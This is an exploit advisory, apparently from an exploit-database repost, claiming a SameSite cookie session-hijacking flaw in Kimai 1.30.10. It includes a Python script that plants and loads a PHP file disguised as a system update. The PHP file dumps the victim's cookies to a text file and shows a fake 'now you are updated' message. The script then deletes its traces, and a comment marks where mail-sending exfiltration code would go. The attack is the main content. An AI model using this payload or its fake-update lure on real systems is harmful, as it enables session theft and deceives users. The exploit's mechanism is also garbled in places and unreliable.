Kimai-1.30.10 SameSite Cookie-Vulnerability session hijacking

## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking## Author: nu11secur1ty## Date: 02.23.2023## Vendor: https://www.kimai.org/## Software: https://github.com/kimai/kimai/releases/tag/1.30.10## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions## Description:The Kimai-1.30.10 is vulnerable toSameSite-Cookie-Vulnerability-session-hijacking.The attacker can trick the victim to update or upgrade the system, byusing a very malicious exploit to steal his vulnerable cookie and getcontrol of his session.STATUS: HIGH Vulnerability[+]Exploit:## WARNING: The EXPLOIT IS FOR ADVANCED USERS!This is only one example:```python#!/usr/bin/pythonimport osimport webbrowserimport timewebbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/en/login')input("After you log in please press any key to continue...")os.system("copy Update.phpC:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\")time.sleep(3)webbrowser.open('https://pwnedhost.com/kimai-1.30.10/public/Update.php')time.sleep(3)os.system("copyC:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txtC:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\")# Your mail-sending code must be here ;)time.sleep(7)os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt")os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")```-----------------------------------------```PHP<?php//echo '<pre>';//print_r( $_COOKIE );//die();$fp = fopen('PoC.txt', 'w');fwrite($fp, print_r($_COOKIE, TRUE));fclose($fp);echo "DONE: Now you are already updated! Enjoy your system Kimai1.30.10 stable (Ayumi)";?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)## Proof and Exploit:[href](https://streamable.com/md9fmr)## Time spend:03:00:00--System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>--System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>

Source: 2300403202-BLW/eussi/moc.ytirucesxc

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享